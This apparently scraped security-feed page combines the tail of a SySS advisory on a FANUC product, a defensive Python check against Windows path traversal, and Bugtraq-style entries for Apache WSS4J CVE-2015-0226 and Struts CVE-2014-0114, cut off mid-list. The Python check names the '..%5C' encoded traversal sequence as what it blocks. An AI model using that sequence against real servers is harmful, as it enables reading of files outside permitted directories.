~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2019-04-23: Vulnerability discovered
2019-05-22: Vulnerability reported to manufacturer
2019-07-15: Public release of SySS security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Manufacturer website:
https://www.fanucamerica.com/
[2] SySS Security Advisory SYSS-2019-025
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-025.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Sebastian Hamann of SySS GmbH.

E-Mail: sebastian.hamann@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Hamann.asc
Key ID: 0x9CE0E440429D8B96
Key Fingerprint: F643 DF21 62C4 7C53 7DB2 8BA1 9CE0 E440 429D 8B96

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
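
Added example (not part of the SySS advisory and not FANUC code): the advisory's "..%5C" sequence passes any filter that only looks for "../" in the raw URL, because the backslash arrives percent-encoded. The Python sketch below decodes the path first and then applies Windows path semantics through ntpath before checking containment. The log root, the function names and the sample paths are constructed for illustration.

```python
import ntpath
from urllib.parse import unquote

# Assumption: hypothetical directory the log viewer is meant to serve from.
LOG_ROOT = r"C:\robots\logs"


def naive_is_safe(raw_path):
    """Weak filter: inspects the raw, still-encoded path for '../' only."""
    return "../" not in raw_path


def resolve_under_root(raw_path, root=LOG_ROOT):
    """Decode, normalise with Windows rules, and require the result to stay
    inside root. Returns the normalised path or raises ValueError."""
    decoded = unquote(raw_path)  # %5C becomes a backslash here
    if "\x00" in decoded:
        raise ValueError("NUL byte in path")
    drive, _ = ntpath.splitdrive(decoded)
    if drive or decoded.startswith(("/", "\\")):
        raise ValueError("absolute, drive or UNC path not allowed")
    root_norm = ntpath.normcase(ntpath.normpath(root))
    # normpath collapses '..' and treats '/' and '\' as the same separator.
    candidate = ntpath.normcase(ntpath.normpath(ntpath.join(root_norm, decoded)))
    # Compare with a trailing separator so 'logs2' is not mistaken for 'logs'.
    if candidate != root_norm and not candidate.startswith(root_norm + "\\"):
        raise ValueError("path escapes the log root")
    return candidate


def is_allowed(raw_path, root=LOG_ROOT):
    """Boolean wrapper around resolve_under_root for use in request handlers."""
    try:
        resolve_under_root(raw_path, root)
        return True
    except ValueError:
        return False
```

On a real Windows host the same check should be applied to the fully resolved path (after symlinks and junctions are followed), since ntpath.normpath is purely lexical.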



Apache WSS4J CVE-2015-0226 Information Disclosure Vulnerability



Apache WSS4J is prone to an information-disclosure vulnerability.

Successfully exploiting this issue can allow an attacker to obtain sensitive information that may aid in launching further attacks.

Information

Bugtraq ID: 72553
Class: Design Error
CVE: CVE-2015-0226

Remote: Yes
Local: No
Published: Feb 10 2015 12:00AM
Updated: Jul 17 2019 05:00AM
Credit: The vendor reported this issue.
Vulnerable: Redhat JBoss Fuse 6.1.0
Redhat JBoss Enterprise Application Platform 6.3
Redhat JBoss A-MQ 6.1.0
Oracle PeopleSoft Enterprise PeopleTools 8.57
Oracle PeopleSoft Enterprise PeopleTools 8.56
Oracle PeopleSoft Enterprise PeopleTools 8.55
IBM WebSphere Application Server Liberty Profile 8.5.5.5
IBM WebSphere Application Server Liberty Profile 8.5.5.4
IBM WebSphere Application Server Liberty Profile 8.5.5.3
IBM WebSphere Application Server Liberty Profile 8.5.5.2
IBM WebSphere Application Server Liberty Profile 8.5.5.1
IBM WebSphere Application Server Liberty Profile 8.5
IBM Care management 6.0
IBM Cúram Social Program Management 6.0.5
IBM Cúram Social Program Management 6.0.4
IBM Cúram Social Program Management 6.1
IBM Cúram Social Program Management 6.0 SP2
IBM Cúram Social Program Management 5.2 SP6
Apache Wss4j 1.6.14
Apache Wss4j 2.0.1
Apache Wss4j 1.6.16
Apache Wss4j 1.6.15
Apache Wss4j 1.6.13
Apache Wss4j 1.6.12
Apache Wss4j 1.6.11
Apache Wss4j 1.6.10


Not Vulnerable: Redhat JBoss Fuse 6.2
Redhat JBoss Enterprise Application Platform 6.4
Redhat JBoss A-MQ 6.2
IBM WebSphere Application Server Liberty Profile 8.5.5.6
Apache Wss4j 2.0.2
Apache Wss4j 1.6.17


Exploit


Attackers can use readily available tools to exploit this issue.


    Apache Struts ClassLoader Manipulation CVE-2014-0114 Security Bypass Vulnerability



    Apache Struts is prone to a security-bypass vulnerability because it fails to adequately handle user-supplied input.

    An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may lead to further attacks.

    Apache Struts versions 1.0.0 through 1.3.10 are vulnerable.

    Information

    Bugtraq ID: 67121
    Class: Design Error
    CVE: CVE-2014-0114

    Remote: Yes
    Local: No
    Published: Apr 29 2014 12:00AM
    Updated: Jul 17 2019 07:00AM
    Credit: Rene Gielen
    Vulnerable: VMWare vCenter Server 5.5
    VMWare vCenter Server 5.1
    VMWare vCenter Server 5.0
    SuSE SUSE Linux Enterprise Software Development Kit 11 SP3
    SuSE Manager (for SLE 11 SP2) 1.7
    Redhat Network Satellite Server (for RHEL 6) 5.6
    Redhat Network Satellite Server (for RHEL 6) 5.5
    Redhat Network Satellite Server (for RHEL 6) 5.4
    Redhat JBoss Operations Network 3.2.1
    Redhat JBoss Fuse 6.1.0
    Redhat Fuse ESB Enterprise 7.1.0
    Redhat Enterprise Linux Desktop Workstation 5 client
    Redhat Enterprise Linux 5 Server
    Oracle Weblogic Server 12.1.3
    Oracle Weblogic Server 12.1.2 0
    Oracle Weblogic Server 12.1.1 0
    Oracle Weblogic Server 10.3.6 0
    Oracle Weblogic Server 12.2.1.2
    Oracle Weblogic Server 12.2.1.1
    Oracle Weblogic Server 12.2.1.0
    Oracle Weblogic Server 12.1.3.0
    Oracle Weblogic Server 10.0.2
    Oracle Weblogic Portal 10.3.6.0
    Oracle Weblogic Portal 10.2.1.0
    Oracle Weblogic Portal 10.0.1.0
    Oracle Waveset 8.1.1
    Oracle Utilities Framework 4.3.0.3.0
    Oracle Utilities Framework 4.3.0.2.0
    Oracle Utilities Framework 4.3.0.1.0
    Oracle Utilities Framework 4.2.0.3.0
    Oracle Utilities Framework 4.2.0.2.0
    Oracle Utilities Framework 4.2.0.1.0
    Oracle Utilities Framework 4.1.0.2.0
    Oracle Utilities Framework 4.1.0.1.0
    Oracle Retail Returns Management 2.0
    Oracle Retail Returns Management 14.0
    Oracle Retail Returns Management 13.4
    Oracle Retail Returns Management 13.3
    Oracle Retail Returns Management 13.2
    Oracle Retail Returns Management 13.1
    Oracle Retail Markdown Optimization 13.4
    Oracle Retail Markdown Optimization 13.2
    Oracle Retail Markdown Optimization 13.1
    Oracle Retail Markdown Optimization 13.0
    Oracle Retail Markdown Optimization 12.0
    Oracle Retail Invoice Matching 14.1
    Oracle Retail Invoice Matching 14.0
    Oracle Retail Invoice Matching 13.2
    Oracle Retail Invoice Matching 13.1
    Oracle Retail Invoice Matching 13.0
    Oracle Retail Invoice Matching 12.1
    Oracle Retail Invoice Matching 12.0IN
    Oracle Retail Invoice Matching 12.0
    Oracle Retail Invoice Matching 11.0
    Oracle Retail Clearance Optimization Engine 14.0
    Oracle Retail Clearance Optimization Engine 13.4
    Oracle Retail Clearance Optimization Engine 13.3
    Oracle Retail Central Office 8.0
    Oracle Retail Central Office 14.0
    Oracle Retail Central Office 13.4
    Oracle Retail Central Office 13.3
    Oracle Retail Central Office 13.2
    Oracle Retail Central Office 13.1
    Oracle Retail Central Office 13.0
    Oracle Retail Central Office 12.0.9IN
    Oracle Retail Central Office 12.0
    Oracle Retail Back Office 8.0
    Oracle Retail Back Office 14.1
    Oracle Retail Back Office 14.0
    Oracle Retail Back Office 13.4
    Oracle Retail Back Office 13.3
    Oracle Retail Back Office 13.2
    Oracle Retail Back Office 13.1
    Oracle Retail Back Office 13.0
    Oracle Retail Back Office 12.0.9IN
    Oracle Retail Back Office 12.0
    Oracle Retail Allocation 13.2
    Oracle Retail Allocation 13.1
    Oracle Retail Allocation 13.0
    Oracle Retail Allocation 12.0
    Oracle Retail Allocation 11.0
    Oracle Retail Allocation 10.0
    Oracle Real-Time Decision Server 11.1.1.7
    Oracle Real-Time Decision Platform 3.0
    Oracle Primavera P6 Enterprise Project Portfolio Management 8.4
    Oracle Primavera P6 Enterprise Project Portfolio Management 8.3
    Oracle Primavera P6 Enterprise Project Portfolio Management 8.2
    Oracle Primavera P6 Enterprise Project Portfolio Management 8.1
    Oracle Primavera P6 Enterprise Project Portfolio Management 8.0
    Oracle Primavera P6 Enterprise Project Portfolio Management 7.0
    Oracle Primavera P6 Enterprise Project Portfolio Management 16.2
    Oracle Primavera P6 Enterprise Project Portfolio Management 16.1
    Oracle Primavera P6 Enterprise Project Portfolio Management 15.2
    Oracle Primavera P6 Enterprise Project Portfolio Management 15.1
    Oracle Primavera Contract Management 14.0
    Oracle Primavera Contract Management 13.1
    Oracle Knowledge 8.5.1
    Oracle Knowledge 8.6.1
    Oracle Knowledge 8.6.0
    Oracle Knowledge 8.5.1.7
    Oracle JDeveloper 12.1.3 0
    Oracle JDeveloper 12.1.2 0.0
    Oracle JDeveloper 11.1.2 4.0
    Oracle JDeveloper 11.1.1 7.0
    Oracle JDeveloper 10.1.3.5.0
    Oracle Insurance IFRS 17 Analyzer 8.0.7
    Oracle Insurance IFRS 17 Analyzer 8.0.6
    Oracle Identity Manager 11.1.2 2
    Oracle Identity Manager 11.1.2 1.0
    Oracle Identity Manager 11.1.1.7
    Oracle Identity Manager 11.1.1.5
    Oracle Fusion Middleware 11.1.2 2.0
    Oracle Fusion Middleware 11.1.2 1.0
    Oracle Fusion Middleware 11.1.1 7.0
    Oracle Fusion Middleware 11.1.1.5.0
    Oracle Enterprise Linux 5
    Oracle Enterprise Data Quality 9.0.11
    Oracle Enterprise Data Quality 8.1.2
    Oracle Communications WebRTC Session Controller 7.2
    Oracle Communications WebRTC Session Controller 7.1
    Oracle Communications WebRTC Session Controller 7.0
    Oracle Communications MetaSolv Solution 6.2.1 0.0
    NTT DATA Corporation TERASOLUNA Server Framework for Java 2.0.5 1
    NTT DATA Corporation TERASOLUNA Server Framework for Java 2.0 1
    Mandriva Business Server 1 X86 64
    Mandriva Business Server 1
    MandrakeSoft Enterprise Server 5 x86_64
    MandrakeSoft Enterprise Server 5
    Liferay Portal 6.2.1-ce-ga2-securit
    Liferay Portal 6.2.1
    Juniper Security Threat Response Manager 2013.2
    Juniper Security Threat Response Manager 2012.1
    Juniper Secure Analytics 2013.2
    Juniper Secure Analytics 2012.1
    IBM WebSphere Service Registry and Repository 8.5
    IBM WebSphere Service Registry and Repository 8.0
    IBM WebSphere Service Registry and Repository 7.5
    IBM WebSphere Service Registry and Repository 7.0
    IBM WebSphere Service Registry and Repository 6.3
    IBM WebSphere Service Registry and Repository 6.2
    IBM WebSphere Sensor Events 7.0
    IBM Websphere Portal 7.0
    IBM Websphere Portal 8.5
    IBM Websphere Portal 8.0
    IBM Websphere Portal 6.1
    IBM WebSphere Partner Gateway Express Edition 6.0.0.3
    IBM WebSphere Partner Gateway Express Edition 6.0
    IBM WebSphere Partner Gateway Enterprise Edition 6.2
    IBM WebSphere Partner Gateway Advanced Edition 6.2
    IBM WebSphere Lombardi Edition 7.2
    IBM WebSphere Lombardi Edition 7.1.0
    IBM WebSphere Enterprise Service Bus 7.5
    IBM WebSphere Enterprise Service Bus 7
    IBM WebSphere Enterprise Service Bus 6.2
    IBM Websphere Application Server 8.5.5
    IBM Websphere Application Server 8.0 2
    IBM Websphere Application Server 8.0 1
    IBM Websphere Application Server 7.0 21
    IBM Websphere Application Server 8.5
    IBM Websphere Application Server 8.0.0.3
    IBM Websphere Application Server 8.0
    IBM Websphere Application Server 7.0.0.31
    IBM Websphere Application Server 7.0.0.27
    IBM Websphere Application Server 7.0.0.25
    IBM Websphere Application Server 7.0.0.23
    IBM Websphere Application Server 7.0.0.19
    IBM Websphere Application Server 7.0.0.17
    IBM Websphere Application Server 7.0.0.15
    IBM Websphere Application Server 7.0.0.13
    IBM Websphere Application Server 7.0
    IBM Websphere Application Server 6.1.0.47
    IBM Websphere Application Server 6.1.0.45
    IBM Websphere Application Server 6.1.0.43
    IBM Websphere Application Server 6.1.0.39
    IBM Websphere Application Server 6.1.0.37
    IBM Websphere Application Server 6.1.0.35
    IBM Websphere Application Server 6.1.0.34
    IBM Websphere Application Server 6.1.0.33
    IBM Websphere Application Server 6.1.0.31
    IBM Websphere Application Server 6.1
    IBM WEB Interface for Content Management 1.0.4
    IBM Tivoli Workload Scheduler z/OS Connector 8.5.1
    IBM Tivoli Workload Scheduler z/OS Connector 8.5
    IBM Tivoli Workload Scheduler Distributed 8.6
    IBM Tivoli Workload Scheduler Distributed 8.5.1
    IBM Tivoli Workload Scheduler Distributed 8.5
    IBM Tivoli Workload Scheduler Distributed 8.4
    IBM Tivoli System Automation Application Manager 3.2.2
    IBM Tivoli System Automation Application Manager 3.2.1
    IBM Tivoli System Automation Application Manager 3.2
    IBM Tivoli System Automation Application Manager 3.1
    IBM Tivoli Storage Productivity Center 5.1.1 3
    IBM Tivoli Storage Productivity Center 5.1.1
    IBM Tivoli Storage Productivity Center 5.1
    IBM Tivoli Storage Productivity Center 4.2.2 143
    IBM Tivoli Storage Productivity Center 5.1.1.4
    IBM Tivoli Storage Productivity Center 5.1.1.2
    IBM Tivoli Storage Productivity Center 5.1.1.1
    IBM Tivoli Storage Productivity Center 5.1.1.0
    IBM Tivoli Storage Productivity Center 5.1
    IBM Tivoli Storage Productivity Center 4.2.2.177
    IBM Tivoli Storage Productivity Center 4.2.2.145
    IBM Tivoli Storage Productivity Center 4.2.1
    IBM Tivoli Storage Productivity Center 4.2.0
    IBM Tivoli Storage Productivity Center 4.1
    IBM Tivoli Storage Manager Administration Center 6.3
    IBM Tivoli Storage Manager Administration Center 6.2
    IBM Tivoli Storage Manager Administration Center 6.1
    IBM Tivoli Storage Manager 6.3.0
    IBM Tivoli Storage Manager 6.2
    IBM Tivoli Storage Manager 6.1
    IBM Tivoli Provisioning Manager for Software 5.1
    IBM Tivoli Provisioning Manager 7.2
    IBM Tivoli Provisioning Manager 7.1
    IBM Tivoli Provisioning Manager 5.1
    IBM Tivoli Netcool/OMNIbus Web GUI 7.4
    IBM Tivoli Netcool/OMNIbus Web GUI 7.3.1
    IBM Tivoli Netcool/OMNIbus Web GUI 7.3
    IBM Tivoli Netcool Configuration Manager 6.4.1
    IBM Tivoli Netcool Configuration Manager 6.3
    IBM Tivoli Netcool Configuration Manager 6.4
    IBM Tivoli Netcool Configuration Manager 6.2
    IBM Tivoli Integrated Portal 1.1.1 15
    IBM Tivoli Integrated Portal 1.1.1 14
    IBM Tivoli Integrated Portal 2.2
    IBM Tivoli Integrated Portal 2.1
    IBM Tivoli Integrated Portal 1.1.1.19
    IBM Tivoli Integrated Portal 1.1
    IBM Tivoli Identity Manager 5.1
    IBM Tivoli Identity Manager 5.0
    IBM Tivoli Foundations for Application Manager 1.2
    IBM Tivoli Endpoint Manager for Remote Control 9.0
    IBM Tivoli Endpoint Manager for Remote Control 8.2.1
    IBM Tivoli Endpoint Manager for Remote Control 9.0.1
    IBM Tivoli Endpoint Manager for Remote Control 8.2
    IBM Tivoli Dynamic Workload Console 8.5.1
    IBM Tivoli Dynamic Workload Console 8.5
    IBM Tivoli Dynamic Workload Console 8.4
    IBM Tivoli Dynamic Workload Console 8.6.0.0
    IBM Tivoli Composite Application Manager for Websphere 6.1
    IBM Tivoli Composite Application Manager for Application Diagnostics 7.1
    IBM Tivoli Application Dependency Discovery Manager 7.2.2
    IBM Tivoli Application Dependency Discovery Manager 7.2.1
    IBM Tivoli Application Dependency Discovery Manager 7.2
    IBM Tivoli Application Dependency Discovery Manager 7.1.2
    IBM Social Media Analytics 1.3
    IBM Social Media Analytics 1.2
    IBM Smart Analytics System 7700 0
    IBM Smart Analytics System 7600 0
    IBM Smart Analytics System 5710 0
    IBM Smart Analytics System 5600 2
    IBM Smart Analytics System 5600 1
    IBM Smart Analytics System 2050 0
    IBM Smart Analytics System 1050 0
    IBM Security SiteProtector System 3.1
    IBM Security SiteProtector System 3.0
    IBM Security QRadar 7.2.2
    IBM Security QRadar 7.2
    IBM Security QRadar 7.1
    IBM Security QRadar 7.0
    IBM Security Identity Manager 6.0
    IBM Records Manager 8.5
    IBM Records Manager 8.4
    IBM Rational Reporting for Development Intelligence 2.0.6
    IBM Rational Reporting for Development Intelligence 2.0.5
    IBM Rational Reporting for Development Intelligence 2.0.4
    IBM Rational Reporting for Development Intelligence 2.0.3
    IBM Rational Reporting for Development Intelligence 2.0.1
    IBM Rational Reporting for Development Intelligence 2.0 1
    IBM Rational Reporting for Development Intelligence 1.0.2 1
    IBM Rational Reporting for Development Intelligence 1.0.2
    IBM Rational Reporting for Development Intelligence 2.0
    IBM Rational Insight 1.1.1 3
    IBM Rational Insight 1.1.1 2
    IBM Rational Insight 1.1.1 1
    IBM Rational Insight 1.1.1
    IBM Rational Insight 1.0.1 1
    IBM Rational Insight 1.0.1
    IBM Rational Insight 1.1
    IBM Rational Insight 1.0.1 iFix1
    IBM Rational Application Developer 9.0.1
    IBM Rational Application Developer 8.5.5
    IBM Rational Application Developer 8.5.1
    IBM Rational Application Developer 8.0.4 3
    IBM Rational Application Developer 8.0.4 2
    IBM Rational Application Developer 8.0.4 1
    IBM Rational Application Developer 8.0.4
    IBM Rational Application Developer 8.0.3
    IBM Rational Application Developer 8.0.2
    IBM Rational Application Developer 8.0.1
    IBM Rational Application Developer 7.5.5 5
    IBM Rational Application Developer 7.5.5 3
    IBM Rational Application Developer 7.5.5 2
    IBM Rational Application Developer 7.5.5 1
    IBM Rational Application Developer 7.5.5
    IBM Rational Application Developer 7.5.4
    IBM Rational Application Developer 7.5.3
    IBM Rational Application Developer 7.5.2
    IBM Rational Application Developer 7.5.1
    IBM Rational Application Developer 7.0 9
    IBM Rational Application Developer 7.0 8
    IBM Rational Application Developer 7.0 7
    IBM Rational Application Developer 7.0 6
    IBM Rational Application Developer 7.0 5
    IBM Rational Application Developer 7.0 4
    IBM Rational Application Developer 7.0 3
    IBM Rational Application Developer 7.0 2
    IBM Rational Application Developer 7.0 10
    IBM Rational Application Developer 7.0 1
    IBM Rational Application Developer 9.1
    IBM Rational Application Developer 9.0
    IBM Rational Application Developer 8.5
    IBM Rational Application Developer 8.0
    IBM Rational Application Developer 7.5
    IBM Rational Application Developer 7.0
    IBM QRadar SIEM 7.2 MR2
    IBM QRadar SIEM 7.1 MR2
    IBM QRadar SIEM 7.0 MR5
    IBM Predictive Insight 9.1
    IBM Predictive Insight 7.0
    IBM OpenPages GRC Platform 7.0
    IBM OpenPages GRC Platform 6.2.1
    IBM OpenPages 7.0
    IBM OpenPages 6.1.0.1
    IBM OpenPages 6.0.1.5
    IBM OpenPages 6.0
    IBM OmniFind Enterprise Edition 9.1
    IBM Lotus Quickr for WebSphere Portal 8.5
    IBM Lotus Expeditor 6.2.3
    IBM Lotus Expeditor 6.2.2
    IBM Lotus Expeditor 6.2.1
    IBM Lotus Expeditor 6.2
    IBM Leads 9.1
    IBM Leads 7.0
    IBM Infosphere Master Data Management Server For Product Information 9.1
    IBM Infosphere Master Data Management Server For Product Information 9.0
    IBM InfoSphere Master Data Management - Collaborative Edition 11.0
    IBM InfoSphere Master Data Management - Collaborative Edition 10.1
    IBM InfoSphere Master Data Management - Collaborative Edition 10.0
    IBM InfoSphere MashupHub 3.0
    IBM InfoSphere MashupHub 2.0
    IBM InfoSphere Information Server 9.1.2.0
    IBM InfoSphere Information Server 9.1
    IBM InfoSphere Information Server 8.7
    IBM InfoSphere Information Server 8.5
    IBM InfoSphere Information Server 8.1
    IBM InfoSphere Information Server 8.0
    IBM InfoSphere Identity Insight 8.1
    IBM InfoSphere Identity Insight 8.0
    IBM InfoSphere Balanced Warehouse D5100
    IBM InfoSphere Balanced Warehouse C4000
    IBM InfoSphere Balanced Warehouse C3000
    IBM IBM InfoSphere Information Server 9.1
    IBM IBM InfoSphere Information Server 8.7
    IBM IBM InfoSphere Information Server 8.5
    IBM IBM InfoSphere Information Server 8.1
    IBM Financial Transaction Manager 2.1
    IBM FileNet P8 Platform Content Search Engine 4.5.1
    IBM FileNet P8 Platform Content Search Engine 5.1
    IBM FileNet P8 Platform Content Search Engine 5.0
    IBM FileNet Content Manager Content Engine 5.2.0
    IBM Endpoint Manager for Remote Control 9.1.0
    IBM DS8870 7.3
    IBM DS8870 7.2
    IBM DS8870 7.1
    IBM DS8870 7.0
    IBM Distributed Marketing 9.1
    IBM Distributed Marketing 9.0
    IBM Distributed Marketing 8.6
    IBM Distributed Marketing 8.5
    IBM Distributed Marketing 8.2
    IBM Distributed Marketing 8.0
    IBM Distributed Marketing 7.5
    IBM Distributed Marketing 7.0
    IBM Content Navigator 2.0.2
    IBM Content Navigator 2.0.1
    IBM Content Navigator 2.0
    IBM Content Manager Records Enabler 8.5
    IBM Content Manager Records Enabler 8.4
    IBM Content Collector 2.2
    IBM Content Analytics with Enterprise Search 3.0
    IBM Content Analytics with Enterprise Search 2.2
    IBM Contact Optimization 9.1
    IBM Contact Optimization 8.0
    IBM Contact Optimization 7.0
    IBM Connections 3.0 0
    IBM Connections 2.0.1 0
    IBM Connections 5.0
    IBM Connections 4.5
    IBM Connections 4.0
    IBM Connections 3.0.1.1
    IBM Connections 3.0.1.0
    IBM Connections 3.0.1
    IBM Connections 3.0
    IBM Connections 2.5.0.3
    IBM Connections 2.5.0.2
    IBM Connections 2.5.0.1
    IBM Connections 2.5.0.0
    IBM Connections 2.0.1.1
    IBM Connections 2.0.0.0
    IBM Cognos Business Intelligence 10.2.1
    IBM Cognos Business Intelligence 10.1.1
    IBM Cognos Business Intelligence 8.4.1
    IBM Cognos Business Intelligence 10.2
    IBM Cognos Business Intelligence 10.1
    IBM Campaign 9.1
    IBM Campaign 9.0
    IBM Campaign 8.6
    IBM Campaign 8.5
    IBM Campaign 8.3
    IBM Campaign 8.2
    IBM Campaign 8.1
    IBM Campaign 8.0
    IBM Campaign 7.6
    IBM Campaign 7.5
    IBM Campaign 7.4
    IBM Campaign 7.3
    IBM Campaign 7.2
    IBM Campaign 7.1
    IBM Campaign 7.0
    IBM Business Process Manager Standard 8.5.5
    IBM Business Process Manager Standard 8.5.0
    IBM Business Process Manager Standard 8.0.x
    IBM Business Process Manager Standard 7.5.0
    IBM Business Process Manager Express 8.5.5
    IBM Business Process Manager Express 8.5.0
    IBM Business Process Manager Express 8.0.0
    IBM Business Process Manager Express 7.5.0
    IBM Business Process Manager Advanced 8.5.5
    IBM Business Process Manager Advanced 8.5
    IBM Business Process Manager Advanced 8.5.0.1
    IBM Business Process Manager Advanced 8.0.1.2
    IBM Business Process Manager Advanced 8.0.1.1
    IBM Business Process Manager Advanced 8.0.0
    IBM Business Process Manager Advanced 7.5.1.2
    IBM Business Process Manager Advanced 7.5.1.1
    IBM Business Process Manager Advanced 7.5.0
    IBM Application Manager for Smart Business 1.2.1
    HP XP7 Global Link Manager Software 8.0.0-00
    HP XP7 Global Link Manager Software 7.6.0-02
    HP XP7 Global Link Manager Software 6.4.0-00
    HP XP P9000 Tiered Storage Manager 8.0.0-06
    HP XP P9000 Tiered Storage Manager 8.0.0-00
    HP XP P9000 Tiered Storage Manager 7.6.1-06
    HP XP P9000 Tiered Storage Manager 1.1.0-00
    HP XP P9000 Replication Manager 8.0.0-06
    HP XP P9000 Replication Manager 8.0.0-00
    HP XP P9000 Replication Manager 7.6.1-06
    HP XP P9000 Replication Manager 6.0.0-00
    HP XP P9000 Replication Manager 5.0.0-00
    HP SiteScope Monitors 11.32IP1
    HP SiteScope Monitors 11.20
    HP SiteScope 11.24
    HP SiteScope 11.22
    HP SiteScope 11.21
    HP SiteScope 11.20
    HP SiteScope 11.2
    HP SiteScope 11.12
    HP SiteScope 11.11
    HP SiteScope 11.10
    HP SiteScope 11.1
    HP IceWall Configuration Manager 3.0
    HP Device Manager 8.0.0-06
    HP Device Manager 8.0.0-00
    HP Device Manager 7.6.1-06
    HP Device Manager 1.0.0-00
    Hitachi Tuning Manager Software 7.0 01 (Windows)
    Hitachi Tuning Manager Software 7.0 01 (Solaris(SPARC))
    Hitachi Tuning Manager Software 7.0 (Windows)
    Hitachi Tuning Manager Software 7.0 (Solaris(SPARC))
    Hitachi Tuning Manager Software 6.4 02 (Windows)
    Hitachi Tuning Manager Software 6.4 02 (Solaris(SPARC))
    Hitachi Tuning Manager Software 6.4 01 (Windows)
    Hitachi Tuning Manager Software 6.4 01 (Solaris(SPARC))
    Hitachi Tuning Manager Software 6.2 -01 (Windows)
    Hitachi Tuning Manager Software 6.2 -01 (Solaris(SPARC))
    Hitachi Tuning Manager Software 6.2 -00 (Windows)
    Hitachi Tuning Manager Software 6.2 -00 (Solaris(SPARC))
    Hitachi Tuning Manager Software 6.1 -00 (Windows)
    Hitachi Tuning Manager Software 6.1 -00 (Solaris(SPARC))
    Hitachi Tuning Manager Software 6.0 (Windows)
    Hitachi Tuning Manager Software 6.0 (Solaris(SPARC))
    Hitachi Tuning Manager Software 8.0.0-05 (Windows)
    Hitachi Tuning Manager Software 8.0.0-05 (Linux(SuSE
    Hitachi Tuning Manager Software 8.0.0-05 (Linux(RHEL
    Hitachi Tuning Manager Software 8.0.0-04 (Windows)
    Hitachi Tuning Manager Software 8.0.0-04 (Linux)
    Hitachi Tuning Manager Software 8.0.0-03 (Windows)
    Hitachi Tuning Manager Software 8.0.0-03 (Linux)
    Hitachi Tuning Manager Software 8.0.0-00 (Windows)
    Hitachi Tuning Manager Software 8.0.0-00 (Linux(SuSE
    Hitachi Tuning Manager Software 8.0.0-00 (Linux(RHEL
    Hitachi Tuning Manager Software 7.6.1-05 (Windows)
    Hitachi Tuning Manager Software 7.6.1-05 (Solaris)
    Hitachi Tuning Manager Software 7.6.1-05 (Solaris(x6
    Hitachi Tuning Manager Software 7.6.1-05 (Solaris(SP
    Hitachi Tuning Manager Software 7.6.1-05 (Linux(RHEL
    Hitachi Tuning Manager Software 7.5.0-02
    Hitachi Tuning Manager Software 7.4.0-02 (Windows)
    Hitachi Tuning Manager Software 7.4.0-02 (Solaris(SP
    Hitachi Tuning Manager Software 7.4.0-02 (Linux)
    Hitachi Tuning Manager Software 7.4.0-01 (Windows)
    Hitachi Tuning Manager Software 7.4.0-01 (Solaris(SP
    Hitachi Tuning Manager Software 7.4.0-01 (Linux)
    Hitachi Tuning Manager Software 7.2.1-00
    Hitachi Tuning Manager Software 7.1.0-00 (Windows)
    Hitachi Tuning Manager Software 7.1.0 (Linux)
    Hitachi Tuning Manager Software 7.0.0-00
    Hitachi Tuning Manager Software 6.4.0-03 (Windows)
    Hitachi Tuning Manager Software 6.4.0-03 (Solaris(SP
    Hitachi Tuning Manager Software 6.0.0 (Solaris)
    Hitachi Tuning Manager Software 3.5.0 (windows)
    Hitachi Tiered Storage Manager Software 7.3 -00 (Windows)
    Hitachi Tiered Storage Manager Software 7.3 -00 (Solaris(x64))
    Hitachi Tiered Storage Manager Software 7.3 -00 (Solaris(SPARC))
    Hitachi Tiered Storage Manager Software 7.3 -00 (Linux(SLES))
    Hitachi Tiered Storage Manager Software 7.3 -00 (Linux(RHEL))
    Hitachi Tiered Storage Manager Software 7.1.1 -00(Windows)
    Hitachi Tiered Storage Manager Software 7.1.1 -00(Solaris(x64))
    Hitachi Tiered Storage Manager Software 7.1.1 -00(Solaris(SPARC))
    Hitachi Tiered Storage Manager Software 7.1.1 -00(Linux(SLES))
    Hitachi Tiered Storage Manager Software 7.1.1 -00(Linux(RHEL))
    Hitachi Tiered Storage Manager Software 7.0 -00 (Solaris(x64))
    Hitachi Tiered Storage Manager Software 6.2 -01 (Windows)
    Hitachi Tiered Storage Manager Software 6.2 -01 (Solaris(x64))
    Hitachi Tiered Storage Manager Software 6.2 -01 (Solaris(SPARC))
    Hitachi Tiered Storage Manager Software 6.2 -01 (Linux)
    Hitachi Tiered Storage Manager Software 6.2 -00 (Windows)
    Hitachi Tiered Storage Manager Software 6.2 -00 (Solaris(x64))
    Hitachi Tiered Storage Manager Software 6.2 -00 (Solaris(SPARC))
    Hitachi Tiered Storage Manager Software 6.2 -00 (Linux)
    Hitachi Tiered Storage Manager Software 6.1.1 -01 (Windows)
    Hitachi Tiered Storage Manager Software 6.1.1 -01 (Solaris(x64))
    Hitachi Tiered Storage Manager Software 6.1.1 -01 (Solaris(SPARC))
    Hitachi Tiered Storage Manager Software 6.1.1 -01 (Linux)
    Hitachi Tiered Storage Manager Software 6.1.1 -00 (Windows)
    Hitachi Tiered Storage Manager Software 6.1.1 -00 (Solaris(x64))
    Hitachi Tiered Storage Manager Software 6.1.1 -00 (Solaris(SPARC))
    Hitachi Tiered Storage Manager Software 6.1.1 -00 (Linux)
    Hitachi Tiered Storage Manager Software 6.1 -01 (Windows)
    Hitachi Tiered Storage Manager Software 6.1 -01 (Solaris(x64))
